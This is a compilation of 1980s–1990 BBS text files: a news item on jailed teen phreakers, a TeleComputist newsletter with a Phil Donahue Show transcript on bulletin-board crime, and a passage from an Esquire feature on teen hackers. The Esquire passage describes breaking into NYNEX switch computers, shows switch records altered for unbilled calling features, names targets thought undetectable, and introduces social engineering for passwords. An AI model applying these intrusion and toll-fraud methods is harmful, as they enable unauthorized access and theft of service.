interactive media developers, on-line database services and others in the
high technology area. He is also author of the book SYSLAW, a legal guide for
bulletin board system operators, available from PC Information Group
(800)321-8285. - Editor]



                                                                       $3.95
TWO TEENS ACCUSED OF CRACKING PHONES -- WHILE IN THE JAILHOUSE

  (Dec. 1)
  Two teen-agers in jail in San Jose, Calif., on computer cracking charges have
lost their jailhouse phone privileges. That's because authorities say the boys
used a jail phone to make illegal collect calls.

  Police told United Press International they believe the two -- Jonathan
Yaantis, 18, and Michael Torrell, 19, both believed to be from Skagit County,
Wash. -- made as many as three illegal calls from the county jail.

  UPI says the calls were made to a phone "bridge," or illegal conference-call
network used by phone "phreakers," and billed to an unauthorized number in
Virginia.

  "The first of the calls was made just two days after they were arrested," 
 said Sgt. Dave Flory of the San Jose Police Department's high technology 
 crime unit.

  Yaantis and Michael Torrell were arrested Nov. 2 by a San Jose police officer
who spotted them at a phone booth near a convenience store. He said they were
operating a laptop computer attached by wires with alligator clips to the phone
wires. Police said insulation had been stripped from the phone wires to allow
the connection.

  Allegedly, one or both of the boys subsequently made calls from the jail to
the cracker network on Nov. 6 and 7, Flory said. He added, "Their telephone
privileges were cut off because we didn't want to be accessories, since they 
are in our custody."

  The wire service says the pair is charged with several felonies, including
damaging the phone company's line, theft and illegal use of phone card charge
numbers and possession of a device to avoid phone charges.
                              TEXT FILE VERSION OF

                           T E L E C O M P U T I S T
                           ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
                                   Newsletter
                                 PART II OF II
                           Typed in September 1, 1986

:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:

                                      NEWS

     AT&T has plans to market a high-contrast, distortion-free-plasma display.
Prototype plasma displays are now in production at AT&T Technology Systems'
manufacturing located in Reading, PA.  The displays will be available in mid-
1986.

     Steve Wozniak has bought about five million dollars worth of Apple Com-
puter stock.  He is thinking about buying up fifteen milion dollars more of
Apple Computer stock.  Wozniak commented that Apple Computer was heading in the
right direction.

     The US Army has given a contract of $2.4 million for the production of 400
Grid portable computers plus software and hardware products.  These portable
computers will be integrated with a tactical telephone switchboard developed by
GTE Government Systems.  These computer systems will provide automated commun-
ications control facilities and will be the standard for use in the field.
-------------------------------------------------------------------------------

From Pirate-80 Systems - 304/744-2253

                         TRANSCRIPT:  PHIL DONAHUE SHOW
                              Aired March 15, 1985

     EDITOR'S NOTES: This is an annotated transcript of the highlights of "The
Phil Donahue Show," which dealt with computer communications and its ramifica-
tions.  The New York-based syndicated television show aired this morning in
many parts of the country.
     Donahue's guests for the discussion were Richard Louv, author of the book
called "America II: The Book that Captures Americans in the Act of Creating the
Future" and Newsweek journalist Richard Sandza, who has reported on the
exploits of computer "crackers."
     Also on the show were demonstrations of the CompuServe and The Source net-
works and regulars of the networking community, including Chris and Pam Dunn of
the CB forum and subscriber Bill Steinberg.
     This file is quite long -- about 20K.  For best results, we'd suggest that
you "scroll" it by entering S at the next prompt.  CTRL-S will freeze the dis-
play; CTRL-Q will resume it.)
     Now, the show begins.  The transcript...

PHIL DONAHUE (to the audience): Do you know who can access a computer to find
 out how much is in your checking account?  How many times you've been
 divorced?  Whether or not you watch dirty movies?  I'm telling you.
UNIDENTIFIED WOMAN IN AUDIENCE: Not true.  Not true.
DONAHUE: Whether your're bankrupt?
THE WOMAN: Yes...
DONAHUE: I don't know if it matters about being careful... (turns to the stage
 to introduce guests)
DONAHUE: This is Richard Louv.  He's written a book entitled "America II"...
 This whole Orwellean thing is not funny.  You know that people are falling in
 love with computers.  I mean, with each other.  There's X-rated computers.
 (Laughter) I'm telling you and you're laughing.
LOUV: (When) I got interested in this whole thing, I (visited some bulletin
 boards and)...it's a good thing my computer has a fan on it.  I was up late
 one night and all this X-rated stuff started coming up on my screen, I mean
 really hardcore.
DONAHUE: You're talking about dirty language.  Not pictures?
LOUV: No, but it's a form of mating.  (Laughter) There's a lot of computer sex
 out there.
DONAHUE (to the audience): You know what they do?  They have hot tub parties...
 Everybody's got a nickname and then if you connect with somebody during this
 party, you and that other person can go off by yourself onto this private
 channel, have a little more X-rated conversation, and then if you want, go
 back to the hot-tub party.  (Laughter) I'm telling you.
LOUV: And there are hundreds of these computer bulletin boards that are
 sexually oriented...
DONAHUE: The problem is: 14-year-olds are doing it....
DONAHUE (introducing second guest): Let me tell you what happened to a Newsweek
 reporter.  This is a real live computer victim here.  Richard Sandza was doing
 a piece for the magazine...
SANDZA: I did a piece talking about these bulletin boards... (to say) "Here's
 what's going on.  There are these bulletin boards and kids are using them to
 exchange illegal information (such as) how to get your credit card."...And
 they came after me because they felt I had broken some sort of pledge and told
 too much about their underground.
DONAHUE: And you had a "teletrial," didn't you?
SANDZA: I was put on teletrial, which is somewhat like the hot tub parties,
 only I think I was going to be boiled in oil in this one.
DONAHUE: A jury and testimony and everything?
SANDZA: Yes, they set up a bulletin board and people would call in and place
 charges against me and say why I should be punished.  I was allowed to defend
 myself.
DONAHUE: You were also getting hostile phone calls at home?  They got your
 phone number?
SANDZA: They got my telephone number and began calling me at home at all hours
 of the day and night.  The worst thing they did was they dialed into (a credit
 card company) and got the whole list of my credit card accounts.  They passed
 the credit card numbers around the country and then they started using the
 credit cards.
DONAHUE: Your wife... you both must have been very, very frightened by all of
 this.
SANDZA: Well, this started on the day my wife went into labor with our first
 child and I called the phone company from the maturity ward to make sure my
 telephone wouldn't be disconnected, as they had been threatened.  They threat-
 ened to blow up my house.  I didn't know whether to take this seriously, but I
 had seen messages (on bulletin boards) on how to make letter bombs, nitro-
 glycerin, pick locks, all these other things, all the things necessary to blow
 up my house in San Francisco.
DONAHUE: Neo-Nazis have computers.
SANDZA: They keep track of their hit lists and pass around information so they
 can keep track of their enemies.
LOUV: Yes, that's a national network.  Any one of you can call into the Neo-
 Nazi's bulletin board, if you have a computer.
SANDZA: Yes, if you want some hate mail, just dial in.
DONAHUE: The KKK is talking to each other on bulletin boards.  A 14-year-old...
 was apparently able to transmit how to make nitroglycerin.
UNIDENTIFIED SPECTATOR: How do you protect yourself from this?
SANDZA: I'm not sure you can protect yourself from this.  Credit bureau com-
 puters are kept so all of us can have credit cards and they have information
 on just about...every adult in the United States.  The security's not even
 (good) enough to keep these kids out.
LOUV: I talked to one guy who gets into these (systems) and he says that the
 TRW computer system is incredibly user-friendly.... I asked TRW about this,
 "How do you get these numbers?" TRW has 30,000 customers -- banks, savings and
 loans -- who call in every day to ask for a credit... They print these numbers
 out.  That's 30,000 leak points for your number.
SANDZA: The kid who got my number, they found... the password and the number
 (in a) garbage can behind a bank in Massachusetts.
UNIDENTIFIED SPECTATOR: I think what you have to consider is, we're blaming the
 computer in this.  It's not the computer.  It's the people using it.
 (Applause.)
SANDZA: You're absolutely right.  ...(Donahue introduces Bill Steinberg at a
 computer terminal.  There's a demonstration of The Source's electronic confer-
 encing system, PARTICIPATION.  The messages shown on the screen from an on-
 line conferences about "sexual gadgets" and devices.)
DONAHUE (to the audience): ... While we're watching this, let's consider some
 of the legal questions.  Can I insult your mother on this thing?  And if I do,
 can you sue me?  How do you find me?  And who's responsible for that libel?
 Is it the computer agency?  The bulletin board itself?  And who's responsible
 ... does thje law oblige the person running the bulletin board to be respon-
 sible? ... You cannot send neo-Nazi mail, hate mail, to Canada, for instance.
 It's illegal...but you can transmit...
SANDZA: Well, that's why they set up the bulletin board.  One of them is in
 Northern Idaho... so that their followers in Canada could dial in and get this
 information.  It's very effective, as I understand.
DONAHUE: (Looking back at the computer screen. To Steinberg:) What have you got
 there?  Oh, it's another sex thing.  We'd better get off this thing...
LOUV: This may be the only safe form of sex left.  (Laughter)
DONAHUE: That's right.  No diseases.

(Steinberg then logs on to CompuServe Service's CB)

DONAHUE: You know what would be fun?  Let's get the checking account of some-
 body in the aduience... I bet you we could.
UNIDENTIFIED SPECTATOR: Use yours... (Laughter)

(Donahue looks at the computer screen again, and notes that one of the CB'ers
 said he was logged on from Montreal)

DONAHUE: So we have an international communications.  Now, one of the things
 that obviously should concern us is that this appears to get around laws that
 government international (communications).  That could include information
 that might hurt somebody.  Racist information that might place somebody at
 risk.  Remember the CB craze.  Wherever there are people communicating, there
 is going to be conflict.  It's another flag.
LOUV: But it's also another opportunity for social activism.  Greenpeace now
 has it's own computer bulletin board network.  So does the anti-nuclear move-
 ment and I think we're entering a period... of strange forms of social acti-
 vism, and this is going to be one of those forms.
SANDZA: It replaces the telephone in alot of cases... The difference here is
 that you're completely anonymous and you don't need somebody's telephone num-
 ber... Maybe there shouldn't be any laws that govern what you say back and
 forth.  There certainly aren't on the telephone.  The difference here is that
 you could keep an actual record (of what was said) on paper and then you could
 rebroadcast that somewhere else.
LOUV: In a sense, this is a return to Tom Paine who printed off cheap pamphlets
 and handed them out in Boston.  These political groups have instant access to
 information.  for instance, how to set up a protest against (a nuclear plant.)
 They can find out in San Francisco immediately how it was done on the East
 Coast...That has enormous power for the future and I'm not sure many of us
 have fully realized that.

(Donahue introduces Chris and Pamela Dunn in the audience)

DONAHUE: They look happy, don't they?  Well, they are.  Very happy.  (To the
 Dunns)  You're married, aren't you?  They met via computer terminals.  How did
 this happen, and were you alone, or at work, or...?
PAM DUNN: I was alone at home and I was using a terminal to access CompuServe,
 utilizing the CB network.  That was a few years ago now, when it was young and
 there weren't that many people around.  Chris and I started talking to each
 other.  At first, I didn't even know he was male, because we were both using
 handles to have that anonymity.
DONAHUE: What were your handles?
PAM DUNN: Zeroa3.
CHRIS DUNN: ChrisDos, which is a computer term.
PAM DUNN: We got to talk to each other quite frequently and we started having
 parties.  That was the thing to do in CB was to have actual parties so people
 could meet each other.  And I came from Chicago to New York and met and
 (laughs) made history.
..
CHRIS DUNN: (The parties became national parties eventually).  I flew to San
 Francisco to meet some people, just to have a nice time.  They didn't have
 anything to do with sex or any of this other stuff.  We were just enjoying
 each other's company and talking to each other.  The thing about computers is
 they're just a tool.  People are doing the same thing with them that they've
 done for ages...It's not the computer; it's the people running them.
DONAHUE: Pamela, you're a shy person.  You're not the kind to be found in a
 singles bar.
PAM DUNN: Absolutely not, and I've found this is an incredible way to meet, not
 just a potential spouse, but friends, people you have things in common with,
 people that you don't have things in common with but ways to broaden your
 horizons by encountering them.
CHIS DUNN: And you don't have to be a technie type.  She's a zoo keeper...
DONAHUE: And I assume you can tell a jerk on the screen maybe even easier than
 you can...
PAM DUNN: It takes practice.  You get suckered in a few times...(Laughter)
DONAHUE: Well, there's no guarantees when you meet them.
DONAHUE: (Addressing a portion of the audience) Now am I to understand that all
 you people refer to yourselves as 'users'?  You know, 'user' has become a bad
 word in our culture, but we won't (laughs) suggest that you're doing anything
 wrong...

(While walking through the audience, Donahue talks with a woman who says she
 used to call a number of bulletin boards, but after receiving big phone bills,
 restricted her BBS-hopping to local New York boards.)

DONAHUE: But there are people who can use this equipment without paying the
 phone company?
SANDZA: Sure.  That's one of the things they exchange on these illegal bulletin
 boards.  Most of these people (in the audience) probably haven't been on ill-
 egal bulletin boards and aren't interested in being on them.  But (the bull-
 etin board will) spread information on ... how to beat the phone company... so
 you don't have to worry about those big phone bills...

(Donahue returns to the CompuServe CB demonstration.  He notes that many users
 of CB and other "real-time" conferences send messages such as "<waving>" and
 "<hugs!>," noting this is "really a warm medium.")

LOUV: You know what?  One thing they've found about this, though, is that you'd
 think that you'd be kind of cold and technical using this, with the language?
 The opposite is true.  There's a term, "flaming" (for) when people use elec-
 tronic mail (and) exaggerate everything.  You see exclamation points across
 the screens.  Everything's exaggerated.  People lose their tempers.  Execu-
 tives will swear on these things, when you'd never see them swear in the board
 room... So everything is hot on this medium.  It's not a cold medium.
DONAHUE: (looking at the CB demonstration.) Can you see this?  We've already
 got a wise guy.  "Hi Phil.  I always like Marlo Thomas better." (from a CB'er
 with the handle of "MOM")  (Laughter and applause)...
LOUV: You need to put this into the context, or culture we're in.  I've
 described it as "America II."  It's a culture in which many of us are drawn
 into condos with high-security systems.  More and more things are done in the
 home.  We're more and more isolated.  But just when you think that (we've)
 created an America II where everybody stays inside and (doesn't) touch or any-
 thing, this kind of communication comes along.  That hot medium that I find
 very fascinating.  We're finding new ways to communicate...
SANDZA: The flip-side of this is the misuse of these bulletin boards that pass
 out information about how to break the law, how to invade your privacy, how to
 make bombs...These boards are completely anonymous.  I can say anything I want
 about you.  You can say anything you want about me.  This information moves
 around at the speed of light and if you wanted to spread my credit card around
 the country, you could do it in a flash...
LOUV: This lady back here who said it's not the computer, it's how we use it is
 exactly right.  It's part of the new American culture and we can't get around
 it...

<COMMERCIAL BREAK>

(A woman in the audience comments to Donahue that the computer's seem like
 "adult's toys" to her.)

LOUV: Phil, there's something very ominous that doesn't really have to do with
 the privacy issue and that's the split between America I and America II.  The
 America of poor blacks and chicanos and people who have no access to this
 stuff.  This stuff is rich kids' toys for the most part....

(Another woman says her child saved up to buy his own computer.)

LOUV: Increasingly, it's available to those people...but even when it's avail-
 able, studies have shown, often times they haven't been prepared by their edu-
 cation to use it...They use it by rote memory.  They don't use it in the
 intuitive kinds of ways that middle class are using them.
DONAHUE: It's another vehicle to widen what we have already been told by a
 national commission is a gap between the two Americas.
LOUV: There's a study in Silicon Valley ... of kid who use computers.  The kids
 of the engineers and computer designers....40 percent of (them) had computers.
 Ten miles away, the kids of the parents who... put those computers together, 1
 percent of those kids have computers...

(A woman comments she feels "shut out" by not knowing about computers.)

LOUV: These are the people of America I -- not shut out of the world so much as
 left before... The people of America II are going to be talking internation-
 ally... There's a computer bulletin board in Japan (with which) you can make a
 local call and talk to anyone in the world.  What about the people of America
 I who are being left behind?

(A woman spectator asks: are these people spending too much time with comp-
 uters?)

DONAHUE: Good question.
SANDZA: Perhaps they are.  But we ask ourselves what's going to heppen in the
 '80s, as we move from an industrial society to a service society when compu-
 ters will do the high tech jobs of the future.  These kids...are the ones who
 are going to be ready for those jobs.

<COMMERCIAL BREAK>

(Donahue talks with a man in the audience who says he operates a local computer
 bulletin board and is proud of the fact that it's a "clear board."  The man
 notes that his board deals primarily with sharing computer information.)

DONAHUE (to the audience): You know you can get electronic graffiti.  It's
 another opportunity to display your idiocy, so how are you going to police
 that?  Who's going to take it off?  And if somebody's libeled...

(Woman asks if it should be illegal to have x-rated bulletin boards.)

SANDZA: How are you going to enforce that law?  The only way you can enforce
 that law is to have the people who are the guardians of these young people...
 (interrupted)

(Woman says there's room for both America I and America II, that she hopes some
 people are still "writing poetry and kids going out sailing.")

LOUV: One of the things I discuss in the book is that....America II doesn't
 have to end up where it looks like it's heading.  Look -- how many of your
 communities have spent money on parks lately?...This (computing) is the new
 recreation, the new outdoors and we've got to start looking at these things if
 ...we really want to balance society...
UNIDENTIFIED SPECTATOR: Are we saying that even though there are a lot of
 people doing things that are illegal, there's no way to police it so it's all
 right?
SANDZA: It's virtually impossible to police it...the law's beginning to emerge.
 The federal government passed a law last year making it illegal to trespass in
 a computer, but it applies only to government computers.  The section (dealing
 with) private computers was deleted as it went through congress.
DONAHUE: It's a nightmare when you think about it.  Can they access an (avia-
 tion computer)?  Can they send your plane to the wrong city?  Can they send
 your plane to the wrong runaway?

(Sandza notes that crackers were "into the computer" that kept time on the
 Olympic races.)

<COMMERCIAL BREAK>

(Donahue looks at the computer screen again.  It's now displaying The Source's
 PARTICIPATE this time with an electronic conference on "Single Parenting.")

LOUV: The point isn't the law...the law has to be changed, ovbiously.  But that
 isn't the point.  The point is what kind of alternatives do we provide for
 kids?  This is not a negative technology.  It's neutral.  Kids have to have an
 alternative.  We have to start looking at our cities and countryside and our
 small towns and figure out how to make them more humane for children.

(Man in the audience said he'd like to hear more about Chris and Pam Dunn.)

DONAHUE: I would too...And they're still married even though the show's almost
 over.  (Laughter) How long did you communicate through the computers before
 you actually met?
PAM DUNN: About six months before we actually met.
CHRIS DUNN: We got together a few times back and forth.  She was throwing a
 party and I went to it.  The rest was just plain old love.  It happened that
 way.
DONAHUE: Where was the first time you met?
PAM: Chicago.
DONAHUE: He came to see you.
PAM: Yes, still old-fashioned...
DONAHUE: Did you take him to see the Cubs of the Sox?
PAM: I took him to see the zoo.  (Applause and laughter.)

(Woman says whe wants to have nothing to do with computers asks if she'll have
 no choice in 20 years.)

SANDZA: The technology is heading toward making it much easier for people who
 know nothing about computers to use them.

(Woman asks Sandza what about what the punishment was in his "teletrial" --
 "did they flip the switch or what?")

SANDZA: No.  I made a deal with a friend who's a hacker who crashed the system
 ... he essentially blew up the courthouse.  (Laughter.)

<COMMERICAL BREAK>

(Man in the audience says that something to consider is that "if information is
 currency, then who's minding the bank?")

DONAHUE: And what are the censorship rules?  Who decides?

(following the usual format for the Donahue Show, the camera fades out with
 people in the audience still asking questions.  As the show ends, one man is
 asking if the computer cracker ever break into computers in the Soviet Union.
 No answer is recorded.)

     -End of transcript-
-------------------------------------------------------------------------------

                                Newsletter Staff:

                                    Data Line
                                  Forest Ranger
                                    Rev Enge
                                   Taran King
                                Knight Lightning
                                  Cheap Shades
                                   Ax Murderer
                                   Chris Jones

                              --------------------

                                  SUBSCRIPTIONS

Rates-                                  Please send to-

$12 - 1 Year Individual                 TeleComputist
$20 - 1 Year Corporate                  P.O. Box 2003
$.50- Back Issues                       Florissant, MO  63032

                              --------------------

                                 STAFF COMMENT:

     We have tried to accomplish the formation of the old Tap.  We mean you
will find no glossy paper, color photographs, 40 page issues, advertisement
kits, with professional type-setting and etc.  We believe in content not char-
acter in a newsletter and I would like to stress the word "newsletter".  We
have set this newsletter up to provide the subscriber with new information.  We
We have our own writers but wish for you to contribute information that you
feel is detrimental to others.  We have a set number of pages for each issue
which will be four and will only exceed this quota on special occasions.  Also,
please send letters so we can print your comments regarding information in our
newsletter.

                                        -Staff


                                 ****NOTICE****

Before sending subscription fee, PLEASE contact TELECOMPUTIST via the following
Telex Address:
                               Telex 650-240-6356
                             Answerback 650-240-6356

If you have no Telex access (MCI, CSI, etc.) leave a note to TECHNICIAN on the
Delphi system - Thanks for your cooperation.

                                        - The Editor

=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=
Typists Note:  These files were typed straight from TeleComputist's sample
issue which can be obtained by sending a self-addressed-stamped-envelope with
39 cents of postage on it to the address stated above for subscriptions.  This
file was typed as in the issue except for several minor changes.  The only
major difference between the sample issue and this text file version is that
the issue contained a Bloom County comic strip featuring a hacker.

                     A bored hacker is a frightening thing.
:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:


(>
==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==
        _  _
\      (_><_)             And if you enjoyed this Text-file, Call:
 \_______[]_____       The Works "914's Text-file BBS" at (914)/238-8195
               _\    300/1200 N,8,1 1200 baud only from 6:00pm to 12:00mid
  ___________  \>\      10 Megabytes on-line    Anti-RBBS and Networks
 /           >    \         SysOps: Jason Scott & Terror Ferret
/            =======            (900) Text-files on-line!
-----------------------------------------------------------------------------
The following names compose a monument to last forever in the electronic
highway: Patrizia Bravi  Alessandra Bravi  Glenda Frank   Marcelle Dumont
         Donna Reznik    Valentina Bravi   Britt Warner   Jennifer Gruen
--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--
                         From "Esquire," December 1990

                             "Terminal Delinquents"

Once, they stole hubcaps and shot out streetlights.  Now they're stealing your
social security number and shooting out your credit rating.  A layman's guide
to computer highjinks.

                          By Jack Hitt and Paul Tough



     On a muggy Friday night, we putter about the entrance to the Chelsea Hotel
in New York City, nervously chatting about nothing in particular, pacing,
thumping a dead coffee cup, waiting.  A massive sun - garishly orange,
unnaturally close - tries to wash this skeezy neighborhood with its maudlin
rays, but this is Manhattan, the Chelsea, where Nancy Spungen asked Sid Vicious
to stab her to death; no way.  It moves on, down the runway of Twenty-third
Street to the Hudson River, like all the traffic on this block, unnoticed.  We
are here to meet Kool and Ikon (all hacker names have been changed), reputedly
two of the most talented computer hackers this side of Newark.  They had agreed
to reveal the secrets of their craft, but only if we chose a place such as the
Chelsea, where our work would be untraceable.

     The film-noir tactics are necessary these days because hackers are on the 
lam.  During the last few months a federal sweep of computer hackers, known as
Operation Sun Devil, has targeted the country's hacker elite.  Last spring, 
Secret Service agents raided the homes of scores of kids, seizing not only 
computers but every piece of electronic equipment in sight, down to answering 
machines, cassette recorders, even soldering irons.  These searches had all the
subtlety of SWAT raids: six armed agents - guns drawn - to take one teenager 
into custody.  In one Manhattan bust, a fourteen-year-old boy stepped from the 
shower into the sights of an agent's shotgun.  In all, the government has 
seized twenty-seven thousand computer disks from forty suspected hackers.  Two 
of them are to meet us tonight.

     HACKING, as most of us know it, means breaking into private computer
systems.  More broadly, hacking is about solving problems, getting around 
obstacles, clearing the way.  It involves not only the technical methods of 
skirting computer security, but also convincing the people who run the 
machines to divulge their passwords.  Here at the Chelsea, the obstacle we're 
circumventing is the U.S. Secret Service.

     Until recently, hacking was done in the comfort of one's bedroom, plugged
into Mom and Dad's home phone.  But a government wiretap can do a lot to change
old habits.  Now many hackers carry mobile computer rigs that attach to any 
phone - whether it's a pay phone on the street or the room phone in a hotel.

     According to the media kit issued by the Secret Service, the boys we are 
scheduled to meet pose a clear and present danger to the security of both the 
government and the American people: "The conceivable criminal violations of 
this operation have serious implications for the health and welfare of all 
individuals, corporations, and United States government agencies relying on 
computers and telephones to communicate."  In other words, for the "health and
welfare" of us all.

     But when the boys finally arrive and the four of us stand in the lobby of 
the Chelsea, chatting, we find that they are courteous, even deferential.  It 
is difficult to see them as the new Communists, the new menace, the enemy 
within.  And if it is hard to see them as the government's clichs, it is 
equally difficult to see them as the media's, which has chosen adjectives from 
a different page of the thesaurus, depicting hackers either as a group of buck-
toothed dweebs or the lazy sons of the white middle class whose loathing of 
their parents is so intense that they wreak their Freudian revenge upon the 
aptly named Ma Bell.

     The most recent poster boy for computer subversion is Robert Morris Jr., a
former Cornell graduate student convicted earlier this year of releasing a 
virus that disabled nearly six thousand computers nationwide.  Morris's father
was the head of the National Computer Security Center, the government's 
computer-security agency, and the media delighted in painting Morris Jr. as the
spoiled son of privilege ruining his father's good name.  The Ivy League 
student stared out from a thousand newspaper photos, pale and owl-like in his
glasses.  No longer would the government be forced to denounce phantoms; 
computer hacking now had a face and a name.

     But these boys are teenagers - nearly ten years younger than Morris - 
olive-skinned, descended from Mediterranean stock.  Home is a working-class 
urban neighborhood in New Jersey.  They could never consider graduate school 
at Cornell; they're thinking about Passaic County Community College.

     Though handsome, they possess the awkwardness of youth - they are 
seventeen and eighteen years old - so with a little imagination, we could 
certainly write them up as geeks.  Their clothes are standard issue for peer-
pressured teens: baggy jeans, no belt, low-top sneaks, long-sleeved T-shirt.  
No pocket protector, but no hair sculpted into a Dairy Queen offering, either;
just careless teenage hair.  They are similar in appearance - medium height 
and lanky.  Ikon is the shorter of the two and tends to be the more serious.
His jokes are often put-downs, mocking the stupidity of those around him.
Kool's humor is more playful, even lewd; he's constantly checking out the
girls.

     Their language is urban, toughened by "dems" and "dozes;" and youthful,
brimming with "uhs," "likes," and "you knows."  But take out that oral
punctuation, and the syntax is textbook correct.  Their conversations are
surprisingly sophisticated in their understanding not only of the complex
workings of the computer but of the caprices of the human heart as well.

     Under false names and paying in cash, we check into our cheap room, a 
space just big enough for the four of us, painted white every year for half a 
century and furnished with flimsy items stained the color of cocoa.  We 
quickly redecorate, hauling the desk next to the bed and pulling up the chair 
so that we can all sit and see.  We set their portable laptop computer on the 
desk and string a tangle of wires among the computer, various electronic 
gadgets, and the hotel telephone.  Ikon's fingers fly across both the phone's
keypad and the computer's keyboard with blinding speed.

     Eeeep.  We have connected.  We are here to learn how to do this, but for 
now we just stare into the shimmering green screen.  In a matter of minutes we 
are deep in the heart of the telephone company's computers.  It appears that 
Ma Bell has been expecting us; the screen suddenly displays a boxed note,
unambiguous in its meaning:

                                W A R N I N G
     Access to this computer and to the computer data and computer
     materials accessible by use of this computer is restricted to those 
     whose access has been authorized by NYNEX or its subsidiary companies.
     Use by unauthorized individuals or use for unauthorized purposes is a
     violation of Federal and/or State Laws.

Kool asks Jack for his home telephone number.  More light-speed hand movements.
The room is still with concentration, interrupted occasionally by an 
incomprehensible chatter of acronyms and a strange, bureaucratic-sounding
shorthand.  Suddenly, a series of numeric patterns blooms on the screen.  It
looks like this:

M 00 TR01 555 0000
0 0 0 0
LEN 10 121 306
001 000 000 000 000 000 4
000 000 000 000 000 000 000 000
0 0 0 0
0 0 0 0

"Doesn't mean much to you, does it Jack?" asks Ikon.  "This is what a phone 
number really looks like.  The LEN is your line-equipment number.  It's the 
actual hardware, the only thing that matters.  Your phone number is just 
scratch-pad nonsense.  I could change it right now, if I wanted to.  It could 
be anything at all."

     More clacking on the keyboard, and a new image appears:

M 01 TR75 1 ID 555 0000 00000002
PIC 222 TTC

Ikon makes a few changes, and the configuration looks like this:

M 12 TR75 1 DN 555 0000 00000003
PIC 288 TWC TTC

Jack has just been granted three-way calling (TWC) and has switched his long-
distance carrier from MCI (222) to AT&T (288).  At such profound digital 
levels, these changes will escape the NYNEX business office.  Consequently, 
Jack will never be billed.

     This deep into the system, many other things are possible - from the 
simple, such as finding an unlisted phone number with an address or a name, to
the sinister, such as monitoring the conversation of anyone we choose by 
quietly dropping in on the phone line like an operator, undetected.  All of it 
is rather simple, they insist, once you understand the structure of the 
system.  If you're not STUPID (the ultimate hacker put-down), if you apply
common sense to the system, hacking is a piece of cake.
     The image of the powerful and reckless hacker, capable of rooting around
in our most-secret computer systems, unleashing crippling computer viruses,
disrupting phone service, crashing hospital computers, and changing school
records, is the one most affirmed by law-enforcement officials and the daily
media.  This is not so only because it easily suits the respective purposes of
these institutions - whip up public loathing so the sons of bitches can be
arrested; sell newspapers - but also because it is largely true.  This
representation fails, however, because it doesn't answer the most obvious
question: If hackers really have the knowledge to do such things, why haven't
they used it?  Why aren't we living in a constant nightmare of paralyzed phone
systems and crashing computer banks?  To answer this question, we have spent
the last year getting to know more than a dozen of the best hackers in America.
Over time, we won their trust and were admitted into their ranks.  We
apprenticed ourselves to them so that we could learn what damage they really
CAN do and why they don't do it.


Hacking, at its most mechanical, requires that you arrange an electronic
conversation between your humble laptop (Radio Shack, $800) and a huge
computer - brimming with information - inside some corporate headquarters,
government agency, or university.  The conversation takes place in a very
human way - using a telephone.  The laptop uses a modem (Radio Shack, $150) to 
translate the digital pulses of a computer into the hisses and beeps that 
travel over regular phone lines.

     In the comfort of your home, a modem can be plugged directly into the 
back of the telephone.  When you're using plugless phones, like hotel phones
and pay phones, one more step is required.  An acoustic coupler (Laptop Shop,
$150), tightly strapped to the phone receiver, allows the computer to fire
audio tones directly through the handset, the way we do when we speak.

     Just like people, computers have phone numbers, known as "dialups."  When
you call a computer, its own modem hears the tones coming through the phone
line and translates your hisses and beeps back into the electronic pulses the
computer can understand.  You're connected.  The hacking can begin.

     There are thousands of systems to hack, and dozens of hackers for each
one.  For Kool and Ikon, though, there's only one game in town - the phone
company.

     Hacking Ma Bell dates back to the late Sixties, when phone hackers, then
dubbed "phone phreaks," discovered that the entire AT&T phone system could be 
controlled by whistling tones at various frequencies directly into a phone.
One notorious hacking pioneer, John Draper, made the farcical discovery that
the toy whistle in a box of Cap'n Crunch perfectly mimicked the 2,600-hertz
tone that engaged a long-distance line, enabling him to make free calls
anywhere in the world.  Draper assumed the cereal's name as his "nom de haque,"
and he and his generation spent years deciphering the meanings of different
tones.  The perfection of the "blue box" - a portable device that duplicated
the tones needed to master the phone system - became the ultimate mission.

     With the advent of long-distance calling cards, which are easily
filchable, hackers today take free long-distance calls for granted.  What
interests Captain Crunch's descendants are the computers that control and link
our phones.  Soon after the Captain Crunch era, AT&T was broken up into a
network of "baby Bells" (regional phone systems).  These are now the main
event.  Kool and Ikon hack NYNEX, which handles phone service for all of New
York and New England.

     The first stop for your phone line, after it snakes out of your house, is
a local switching center.  The "switch" directly controls all the phones in
your neighborhood.  A switch performs the same service as Lily Tomlin's cranky
operator, Ernestine, who would plug your phone jack into the line that you
were calling.  Today, your switch makes that connection electronically, and
does it for as many as 150,000 phones.

     Each neighborhood switch is controlled by its own huge computer; these
computers are the essential targets of the phone-company hacker.  If you can
access the computer for a switch, you can control every phone it does.  You
can turn those phones on and off, reroute calls, and change numbers.

     When this knowledge grows boring, the explorer can investigate the dozens
of NYNEX's more complicated computer systems, each containing hundreds of new
passageways and strange domains.  For the advanced hacker, one of the more
attractive is the infelicitously named NYNEX Packet Switched Network, or NPSN.
Its beauty is its strength: The system allows you to enter each of the more
than one thousand switches in New York and New England.  Even more appealing,
it allows you to ricochet off onto regional maintenance systems such as COSMOS
and MIZAR.  Among its many talents, COSMOS sends out instructions to create
and kill phone numbers.  The local MIZAR actually does the work.  Since COSMOS
keeps the records and MIZAR doesn't, most hacking done on a MIZAR is
undetectable.  MIZARs are a hacker-favorite.

     In order to get into any computer, you need a dialup number, an account 
name (or "login"), and a password.  Most people encounter the basics of this 
process every time they approach an automatic-teller machine.  Knowing where
to find an ATM is your dialup; placing your card with its black magnetic strip
in the slot is like entering your account; punching in your personal
identification number is like typing your password.  The secret of obtaining
these three keys for breaking into a phone-company computer - or any computer -
is simple, our tutor explain, and can be learned as easily over a banana split
in an air-conditioned diner as over a computer screen.  We abandon our
sweltering room at the Chelsea and head to the local joint.  On the plate-glass
window of the restaurant we notice a decal that boasts, INSIDE: A PUBLIC PHONE
YOU CAN DEPEND ON.

     Over burgers and ice cream, we learn that there are several mechanical
ways of learning accounts and passwords, but that there's an easier way, known
as social engineering.  Basically, social engineering is bullshitting -
calling someone who has access to a system and convincing them that you are a
legitimate user who needs a dialup number, an account, and a password.

